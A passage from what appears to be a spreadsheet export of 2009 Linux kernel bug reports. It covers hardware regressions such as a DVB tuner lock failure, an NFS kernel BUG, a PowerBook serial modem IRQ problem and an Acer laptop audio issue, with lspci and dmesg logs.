&gt;SERR- &lt;PERR- INTx- Latency: 96, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at ef20 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at ef40 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) (prog-if 20 [EHCI]) Subsystem: VIA Technologies, Inc. USB 2.0 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 21 Region 0: Memory at fe900000 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South] Subsystem: ASUSTeK Computer Inc. A7V600/K8V-X/A8V Deluxe motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: i2c-viapro 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60) Subsystem: ASUSTeK Computer Inc. Asus P5VD1-X (AD1888 codec [SoundMax]) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 22 Region 0: I/O ports at e400 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: VIA 82xx Audio Kernel modules: snd-via82xx 00:11.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 80) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 0 Region 0: I/O ports at 1000 [disabled] [size=256] Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) (prog-if 00 [VGA controller]) Subsystem: XFX Pine Group Inc. Unknown device 1280 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at fd000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at a0000000 (32-bit, prefetchable) [size=128M] [virtual] Expansion ROM at fe200000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Kernel driver in use: nvidia Kernel modules: nvidia</t>
  </si>
  <si>
    <t>Terratec CinergyT² can only lock with option frontend_debug=1 for dvb_core</t>
  </si>
  <si>
    <t>2009-03-19 13:36 UTC</t>
  </si>
  <si>
    <t>2010-09-06 07:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28 Distribution: openSUSE 11.1 Hardware Environment: i686, Terratec CinergyT² Software Environment: tzap Problem Description: tzap can only lock to a channel if dvb_core is loaded with option frontend_debug=1 Without that option it gives tzap -c .mplayer/channels.conf -r ZDF using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0' reading channels from file '.mplayer/channels.conf' tuning to 778000000 Hz video pid 0x0221, audio pid 0x0222 status 01 | signal 2223 | snr 0000 | ber 00000000 | unc 00000000 | status 07 | signal 0220 | snr 5c5c | ber 00000000 | unc 00000000 | status 05 | signal 911f | snr 0000 | ber 00000000 | unc 00000000 | With frontend_debug=1 it gives tzap -c .mplayer/channels.conf -r ZDF using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0' reading channels from file '.mplayer/channels.conf' tuning to 778000000 Hz video pid 0x0221, audio pid 0x0222 status 01 | signal b11b | snr 0000 | ber 00000000 | unc 00000000 | status 1f | signal 411f | snr 8080 | ber 00000000 | unc 00000000 | FE_HAS_LOCK status 1f | signal 2220 | snr 8282 | ber 00000000 | unc 00000000 | FE_HAS_LOCK</t>
  </si>
  <si>
    <t>rt2500usb: Driver error on resume from STR: iBook G3 600MHz</t>
  </si>
  <si>
    <t>2009-03-20 04:18 UTC</t>
  </si>
  <si>
    <t>2009-06-09 04:57 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version: 2.6.28-rc6 (that I noticed) Distribution: Debian sid Hardware Environment: iBook G3 Combo 600MHz, Late 2001 model Software Environment: Xorg with Fluxbox freshly updated Problem Description: My iBook, with a wifi USB adapter (rt2500usb) gives me a backtrace upon resuming from suspend to RAM with the indication that it was running the process pbbuttonsd (a daemon for monitoring the iBook special buttons). Steps to reproduce: 1. Press the button to suspend 2. Press any key to resume I can give any amount of information about the machine and its behaviour. Thanks for any help, Rogério Brito.</t>
  </si>
  <si>
    <t>CPU frequency alternates between min and max for niced background processes</t>
  </si>
  <si>
    <t>2009-03-20 09:13 UTC</t>
  </si>
  <si>
    <t>2011-07-30 05:54 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27 Earliest failing kernel version:2.6.28.8 Distribution: Gentoo Hardware Environment:hTinkPad T41 Software Environment:stable Gentoo Problem Description: Rinning the BOINC client even with nice level 19 w/ or w/o USER GROUP SCHED enabled results into a periodic alternation of the CPU frequency between 600 MHz and 1700 MHz : http://forums.gentoo.org/viewtopic-t-747140-highlight-.html Steps to reproduce:</t>
  </si>
  <si>
    <t>hard lockup when connecting some external monitors unless acpi_osi="!Windows 2006" - Sony Vaio SR290</t>
  </si>
  <si>
    <t>2009-03-20 11:43 UTC</t>
  </si>
  <si>
    <t>Nik A. Melchior</t>
  </si>
  <si>
    <t>2010-09-28 22:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.26 Distribution: Debian (unstable) Hardware Environment: Sony Vaio SR290 with Mobile 4 Series Chipset Integrated Graphics (PCI ids: 8086:2a42 and 8086:2a43) Software Environment: 64-bit Debian unstable Problem Description: This laptop locks up when certain external display devices are attached after boot. Only overhead projectors seem to cause the lockup. I can attach external LCD monitors at any time and use (e.g.) xrandr without problem. Likewise, if the projector is attached before turning the laptop on, the display will be mirrored and it will work fine. In this case, unplugging the projector will cause the lockup. Steps to reproduce: This problem occurs in X or at the console, with or without the i915 module loaded. It occurs at the console with the framebuffer enabled or with vga=normal. In the latter case, the cursor continues to blink, but the system doesn't respond to keystrokes. Alt+SysRq doesn't work in any of these cases.</t>
  </si>
  <si>
    <t>Limiting cpu time doesn't work</t>
  </si>
  <si>
    <t>2009-03-21 11:16 UTC</t>
  </si>
  <si>
    <t>2009-04-05 10:57 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28, limiting cpu time doesn't work Submitter : Peter Lojkin &lt;ia6432@inbox.ru&gt; Date : 2009-03-19 18:34 References : http://marc.info/?l=linux-kernel&amp;m=123749066504641&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG on fs/nfs/write.c:252 !</t>
  </si>
  <si>
    <t>2.6.29-0.rc8.git2.fc11</t>
  </si>
  <si>
    <t>2009-03-21 13:44 UTC</t>
  </si>
  <si>
    <t>Rich Ercolani</t>
  </si>
  <si>
    <t>2010-02-03 21:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: 2.6.27 Distribution: Fedora 10 x86 Hardware Environment: Intel 82801G chipset motherboard, occurs independent of NIC chipset, all gigabit NICs of different kinds. Software Environment: Fedora 10, tried Fedora 11 kernel after bug initially occurred on 2.6.27 stable kernel from Fedora. Problem Description: Under severe, severe load, NFS will sometimes fall down the stairs, and when trying to find out why a thread was in state D, we find this lovely message in dmesg: kernel BUG at fs/nfs/write.c:252! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/devices/virtual/block/dm-0/range CPU 1 Modules linked in: fuse cpufreq_stats autofs4 coretemp hwmon nfs lockd nfs_acl auth_rpcgss sunrpc ipv6 cpufreq_ondemand acpi_cpufreq freq_table ext4 jbd2 crc16 kvm_intel kvm snd_hda_code c_idt snd_hda_intel snd_hda_codec snd_hwdep snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq ppdev snd_seq_device snd_pcm_oss cpia_usb snd_mixer_oss cpia nouveau videodev pcspkr snd_ pcm drm firewire_ohci i2c_i801 v4l1_compat parport_pc firewire_core v4l2_compat_ioctl32 i82975x_edac usb_storage iTCO_wdt e1000e edac_core crc_itu_t iTCO_vendor_support parport snd_timer i2c_core snd soundcore snd_page_alloc raid1 Pid: 313, comm: pdflush Tainted: G W 2.6.29-0.258.rc8.git2.fc11.x86_64 #1 RIP: 0010:[&lt;ffffffffa03696ca&gt;] [&lt;ffffffffa03696ca&gt;] nfs_do_writepage+0xf5/0x18d [nfs] RSP: 0018:ffff88012d4f9aa0 EFLAGS: 00010202 RAX: 0000000000000001 RBX: ffffe20002f117a0 RCX: 0000000000000015 RDX: 000000001eef1eee RSI: 0000000000000001 RDI: ffff8800276b1860 RBP: ffff88012d4f9ad0 R08: 0000000000000002 R09: ffff8800276b1860 R10: ffff88012d4f9a90 R11: 0000000000000246 R12: ffff880101015b40 R13: ffff8800276b1860 R14: ffff88012d4f9c50 R15: ffff8800276b19e0 FS: 0000000000000000(0000) GS:ffff88012fab2af0(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 00000000f7d50b7c CR3: 0000000126df9000 CR4: 00000000000026e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process pdflush (pid: 313, threadinfo ffff88012d4f8000, task ffff88012e5ba350) Stack: ffff88012e5ba350 ffffffff810b27ea ffffe20002f117a0 ffff88012d4f9e10 ffff88012d517828 0000000000000001 ffff88012d4f9b00 ffffffffa0369b61 ffff88012d4f9b00 0000000000000286 ffffe20002f117a0 ffffe20002f117a0 Call Trace: [&lt;ffffffff810b27ea&gt;] ? clear_page_dirty_for_io+0xbc/0xda [&lt;ffffffffa0369b61&gt;] nfs_writepages_callback+0x16/0x2b [nfs] [&lt;ffffffff810b2c0c&gt;] write_cache_pages+0x252/0x3d2 [&lt;ffffffffa0369b4b&gt;] ? nfs_writepages_callback+0x0/0x2b [nfs] [&lt;ffffffffa030558c&gt;] ? rpc_execute+0x2d/0x31 [sunrpc] [&lt;ffffffffa02ff62a&gt;] ? rpc_run_task+0x5b/0x63 [sunrpc] [&lt;ffffffffa036a7b6&gt;] ? nfs_commit_list+0x1e4/0x254 [nfs] [&lt;ffffffffa0369b24&gt;] nfs_writepages+0x80/0xa7 [nfs] [&lt;ffffffffa0369d3c&gt;] ? nfs_flush_one+0x0/0xf4 [nfs] [&lt;ffffffff810b2de5&gt;] do_writepages+0x30/0x3f [&lt;ffffffff810fd9ce&gt;] __writeback_single_inode+0x18c/0x2d8 [&lt;ffffffff810fdefb&gt;] generic_sync_sb_inodes+0x210/0x362 [&lt;ffffffff810fe245&gt;] ? writeback_inodes+0x91/0x100 [&lt;ffffffff810fe25b&gt;] writeback_inodes+0xa7/0x100 [&lt;ffffffff810b3493&gt;] background_writeout+0x98/0xd1 [&lt;ffffffff810b3c8e&gt;] pdflush+0x158/0x20d [&lt;ffffffff810b33fb&gt;] ? background_writeout+0x0/0xd1 [&lt;ffffffff810b3b36&gt;] ? pdflush+0x0/0x20d [&lt;ffffffff810609ad&gt;] kthread+0x4d/0x78 [&lt;ffffffff810126aa&gt;] child_rip+0xa/0x20 [&lt;ffffffff8100f88b&gt;] ? __switch_to+0x190/0x398 [&lt;ffffffff81011fbe&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff81060960&gt;] ? kthread+0x0/0x78 [&lt;ffffffff810126a0&gt;] ? child_rip+0x0/0x20 Code: 89 e7 e8 37 cf ff ff 4c 89 e7 89 45 d8 e8 a8 cf ff ff 8b 45 d8 85 c0 74 ab eb 7f 41 f6 44 24 40 02 74 0c 4c 89 ef e8 2c d1 02 e1 &lt;0f&gt; 0b eb fe 48 89 df e8 9b 8e d4 e0 85 c0 75 47 48 8b 43 18 48 RIP [&lt;ffffffffa03696ca&gt;] nfs_do_writepage+0xf5/0x18d [nfs] RSP &lt;ffff88012d4f9aa0&gt; As you may imagine, the source of the write() call never gets a return, and stays around in state D until the machine is rebooted. Steps to reproduce: 1) Put NFS under heavy, heavy load. Think gigabit point-to-point between a 10-disk RAID-6 server and this machine, torrenting the entire Debian Lenny CD/DVD set (which is actually how I produced it just now.) 2) This happens at some point.</t>
  </si>
  <si>
    <t>pmac_zilog fails to find IRQ for internal serial modem</t>
  </si>
  <si>
    <t>2009-03-21 14:43 UTC</t>
  </si>
  <si>
    <t>Mike Sadd</t>
  </si>
  <si>
    <t>2012-05-30 14:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.11 Earliest failing kernel version: 2.6.27 Distribution: OpenSUSE 11.1 Hardware Environment: powerpc ( macintosh Powerbook G3 "wallstreet") Software Environment: gcc 4.3.2 Problem Description: After upgrade to 2.6.28.8, the internal serial modem is no longer configured and /dev/ttyPZ2 does not respond. The following is the truncated output of dmesg: Using PowerMac machine description Total memory = 160MB; using 512kB for hash table (at c9f80000) Linux version 2.6.28.8 (sadd@corinth) (gcc version 4.3.2 [gcc-4_3-branch revisio n 141291] (SUSE Linux) ) #1 Thu Mar 19 03:25:12 CDT 2009 Found a Gatwick mac-io controller, rev: 1, mapped at 0xff780000 Found a Heathrow mac-io controller, rev: 1, mapped at 0xff700000 PowerMac motherboard: PowerBook Wallstreet PMU driver v2 initialized for PowerBook G3 Series, firmware: 0a console [udbg0] enabled Found Grackle (MPC106) PCI host bridge at 0x0000000080000000. Firmware bus numbe r: 0-&gt;0 [...] pmac_zilog: serial modem detected [...] pmac_zilog: 0.6 (Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt;) ttyPZ0 at MMIO 0xf3013020 (irq = 16) is a Z85c30 ESCC - Serial port ttyPZ1 at MMIO 0xf3013000 (irq = 17) is a Z85c30 ESCC - Infrared port ttyPZ2 at MMIO 0xf4013020 (irq = 0) is a Z85c30 ESCC - Internal modem The following is /proc/tty/driver/ttyPZ # cat /proc/tty/driver/ttyPZ serinfo:1.0 driver revision: 0: uart:Z85c30 ESCC - Serial port mmio:0xF3013020 irq:16 tx:0 rx:0 DSR 1: uart:Z85c30 ESCC - Infrared port mmio:0xF3013000 irq:17 tx:0 rx:0 DSR|CD 2: uart:Z85c30 ESCC - Internal modem mmio:0xF4013020 irq:0 tx:0 rx:0 DSR Any attempt to configure the modem irq with "setserial /dev/ttyPZ2 autoconfig" results in the error in the system log: Mar 21 16:34:29 corinth kernel: pmac_zilog 1.00013020:ch-a: Unable to register z s interrupt handler. For kernel 2.6.11, with the same hardware, the modem functioned correctly and the IRQ was assigned: pmac_zilog: 0.6 (Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt;) ttyS0 at MMIO 0xf3013020 (irq = 15) is a Z85c30 ESCC - Serial port ttyS1 at MMIO 0xf3013000 (irq = 16) is a Z85c30 ESCC - Infrared port ttyS2 at MMIO 0xf4013020 (irq = 79) is a Z85c30 ESCC - Internal modem Steps to reproduce: Boot a Powerbook G3 using 2.6.28.8 configured to have pmac_zilog and the only enabled serial device.</t>
  </si>
  <si>
    <t>subwoofer for Aspire 7720 isn't working</t>
  </si>
  <si>
    <t>2.6.28-7.slh.6-sidux-686</t>
  </si>
  <si>
    <t>2009-03-21 18:40 UTC</t>
  </si>
  <si>
    <t>Jordan Roy</t>
  </si>
  <si>
    <t>2010-03-20 10:06 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: none Distribution: Sidux Hardware Environment: ******Laptop ACER Aspire 7720 model:ICK70 ******dmesg says: BIOS EBDA/lowmem at: 0009fc00/0009fc00 Initializing cgroup subsys cpuset Initializing cgroup subsys cpu Linux version 2.6.28-7.slh.6-sidux-686 (Debian 2.6.28-37) (s.l-h@gmx.de) (gcc version 4.3.3 (Debian 4.3.3-5) ) #1 SMP PREEMPT Sat Mar 14 02:30:40 UTC 2009 KERNEL supported cpus: Intel GenuineIntel AMD AuthenticAMD NSC Geode by NSC Cyrix CyrixInstead Centaur CentaurHauls Transmeta GenuineTMx86 Transmeta TransmetaCPU UMC UMC UMC UMC BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 00000000bfcfd000 (usable) BIOS-e820: 00000000bfcfd000 - 00000000bfd08000 (reserved) BIOS-e820: 00000000bfd08000 - 00000000bfd52000 (usable) BIOS-e820: 00000000bfd52000 - 00000000bfd55000 (reserved) BIOS-e820: 00000000bfd55000 - 00000000bfdbb000 (usable) BIOS-e820: 00000000bfdbb000 - 00000000bfdbf000 (reserved) BIOS-e820: 00000000bfdbf000 - 00000000bfe70000 (usable) BIOS-e820: 00000000bfe70000 - 00000000bfebf000 (ACPI NVS) BIOS-e820: 00000000bfebf000 - 00000000bff00000 (ACPI data) BIOS-e820: 00000000bff00000 - 00000000c0000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved) BIOS-e820: 00000000fed14000 - 00000000fed1a000 (reserved) BIOS-e820: 00000000fed1c000 - 00000000fed20000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) DMI 2.4 present. last_pfn = 0xbfe70 max_arch_pfn = 0x100000 x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 kernel direct mapping tables up to 377fe000 @ 7000-d000 RAMDISK: 378d2000 - 37fefcda Allocated new RAMDISK: 0053e000 - 00c5bcda Move RAMDISK from 00000000378d2000 - 0000000037fefcd9 to 0053e000 - 00c5bcd9 ACPI: RSDP 000FE020, 0024 (r2 ACRSYS) ACPI: XSDT BFEFE120, 0064 (r1 ACRSYS ACRPRDCT 1 1000013) ACPI: FACP BFEFD000, 00F4 (r4 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: DSDT BFEF4000, 8968 (r1 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: FACS BFE75000, 0040 ACPI: APIC BFEF3000, 0068 (r2 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: MCFG BFEF2000, 003C (r1 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: SLIC BFEF1000, 0176 (r1 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: HPET BFEF0000, 0038 (r1 ACRSYS ACRPRDCT 1 MSFT 1000013) ACPI: SSDT BFEEF000, 04C4 (r1 PmRef CpuPm 3000 INTL 20051117) ACPI: SSDT BFEEE000, 0232 (r1 PmRef Cpu0Tst 3000 INTL 20051117) ACPI: SSDT BFEED000, 00A0 (r1 PmRef Cpu1Tst 3000 INTL 20051117) ACPI: Local APIC address 0xfee00000 2182MB HIGHMEM available. 887MB LOWMEM available. mapped low ram: 0 - 377fe000 low ram: 00000000 - 377fe000 bootmap 00009000 - 0000ff00 (9 early reservations) ==&gt; bootmem [0000000000 - 00377fe000] #0 [0000000000 - 0000001000] BIOS data page ==&gt; [0000000000 - 0000001000] #1 [0000001000 - 0000002000] EX TRAMPOLINE ==&gt; [0000001000 - 0000002000] #2 [0000006000 - 0000007000] TRAMPOLINE ==&gt; [0000006000 - 0000007000] #3 [0000100000 - 000053a2e4] TEXT DATA BSS ==&gt; [0000100000 - 000053a2e4] #4 [000053b000 - 000053e000] INIT_PG_TABLE ==&gt; [000053b000 - 000053e000] #5 [000009fc00 - 0000100000] BIOS reserved ==&gt; [000009fc00 - 0000100000] #6 [0000007000 - 0000009000] PGTABLE ==&gt; [0000007000 - 0000009000] #7 [000053e000 - 0000c5bcda] NEW RAMDISK ==&gt; [000053e000 - 0000c5bcda] #8 [0000009000 - 0000010000] BOOTMAP ==&gt; [0000009000 - 0000010000] found SMP MP-table at [c00fe1b0] 000fe1b0 Zone PFN ranges: DMA 0x00000000 -&gt; 0x00001000 Normal 0x00001000 -&gt; 0x000377fe HighMem 0x000377fe -&gt; 0x000bfe70 Movable zone start PFN for each node early_node_map[5] active PFN ranges 0: 0x00000000 -&gt; 0x0000009f 0: 0x00000100 -&gt; 0x000bfcfd 0: 0x000bfd08 -&gt; 0x000bfd52 0: 0x000bfd55 -&gt; 0x000bfdbb 0: 0x000bfdbf -&gt; 0x000bfe70 On node 0 totalpages: 785917 free_area_init_node: node 0, pgdat c044b300, node_mem_map c1000000 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 3967 pages, LIFO batch:0 Normal zone: 1744 pages used for memmap Normal zone: 221486 pages, LIFO batch:31 HighMem zone: 4365 pages used for memmap HighMem zone: 554323 pages, LIFO batch:31 Movable zone: 0 pages used for memmap ACPI: PM-Timer IO Port: 0x408 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] high edge lint[0x1]) ACPI: IOAPIC (id[0x04] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 4, version 32, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs ACPI: HPET id: 0x8086a201 base: 0xfed00000 Using ACPI (MADT) for SMP configuration information SMP: Allowing 2 CPUs, 0 hotplug CPUs PM: Registered nosave memory: 000000000009f000 - 00000000000a0000 PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000 PM: Registered nosave memory: 00000000000e0000 - 0000000000100000 Allocating PCI resources starting at c2000000 (gap: c0000000:20000000) PERCPU: Allocating 40960 bytes of per cpu data NR_CPUS: 32, nr_cpu_ids: 2, nr_node_ids 1 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 779776 Kernel command line: root=UUID=2c695d69-62b9-4f83-963c-5d0d7d74bfbc ro quiet vga=0x365 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 Preemptible RCU implementation. PID hash table entries: 4096 (order: 12, 16384 bytes) Fast TSC calibration using PIT Detected 1828.890 MHz processor. Console: colour dummy device 80x25 console [tty0] enabled Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 3105632k/3144128k available (2493k kernel code, 37184k reserved, 1107k data, 352k init, 2234752k highmem) virtual kernel memory layout: fixmap : 0xffe18000 - 0xfffff000 (1948 kB) pkmap : 0xff800000 - 0xffc00000 (4096 kB) vmalloc : 0xf7ffe000 - 0xff7fe000 ( 120 MB) lowmem : 0xc0000000 - 0xf77fe000 ( 887 MB) .init : 0xc048b000 - 0xc04e3000 ( 352 kB) .data : 0xc036f78b - 0xc048475c (1107 kB) .text : 0xc0100000 - 0xc036f78b (2493 kB) Checking if this processor honours the WP bit even in supervisor mode...Ok. SLUB: Genslabs=12, HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 hpet clockevent registered HPET: 3 timers in total, 0 timers will be used for per-cpu timer Calibrating delay loop (skipped), value calculated using timer frequency.. 3657.78 BogoMIPS (lpj=1828890) Security Framework initialized SELinux: Disabled at boot. Mount-cache hash table entries: 512 Initializing cgroup subsys ns Initializing cgroup subsys cpuacct Initializing cgroup subsys devices Initializing cgroup subsys freezer CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. using mwait in idle threads. Checking 'hlt' instruction... OK. ACPI: Core revision 20080926 ACPI: Checking initramfs for custom DSDT ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 CPU0: Intel(R) Core(TM)2 Duo CPU T5550 @ 1.83GHz stepping 0d Booting processor 1 APIC 0x1 ip 0x6000 Initializing CPU#1 Calibrating delay using timer specific routine.. 3657.31 BogoMIPS (lpj=1828656) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. x86 PAT enabled: cpu 1, old 0x7040600070406, new 0x7010600070106 CPU1: Intel(R) Core(TM)2 Duo CPU T5550 @ 1.83GHz stepping 0d checking TSC synchronization [CPU#0 -&gt; CPU#1]: passed. Brought up 2 CPUs Total of 2 processors activated (7315.09 BogoMIPS). net_namespace: 728 bytes Booting paravirtualized kernel on bare hardware regulator: core version 0.5 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 255 PCI: MCFG area at e0000000 reserved in E820 PCI: Using MMCONFIG for extended config space PCI: Using configuration type 1 for base access ACPI: EC: Look up EC in DSDT ACPI: BIOS _OSI(Linux) query ignored ACPI: EC: non-query interrupt received, switching to interrupt mode ACPI: EC: GPE storm detected, transactions will use polling mode ACPI: Interpreter enabled ACPI: (supports S0 S3 S4 S5) ACPI: Using IOAPIC for interrupt routing ACPI: EC: GPE = 0x1c, I/O: command/status = 0x66, data = 0x62 ACPI: EC: driver started in poll mode ACPI: No dock devices found. ACPI: PCI Root Bridge [PCI0] (0000:00) pci 0000:00:01.0: PME# supported from D0 D3hot D3cold pci 0000:00:01.0: PME# disabled pci 0000:00:1a.0: reg 20 io port: [0x60c0-0x60df] pci 0000:00:1a.1: reg 20 io port: [0x60a0-0x60bf] pci 0000:00:1a.7: reg 10 32bit mmio: [0xdb304c00-0xdb304fff] pci 0000:00:1a.7: PME# supported from D0 D3hot D3cold pci 0000:00:1a.7: PME# disabled pci 0000:00:1b.0: reg 10 64bit mmio: [0xdb300000-0xdb303fff] pci 0000:00:1b.0: PME# supported from D0 D3hot D3cold pci 0000:00:1b.0: PME# disabled pci 0000:00:1c.0: PME# supported from D0 D3hot D3cold pci 0000:00:1c.0: PME# disabled pci 0000:00:1c.1: PME# supported from D0 D3hot D3cold pci 0000:00:1c.1: PME# disabled 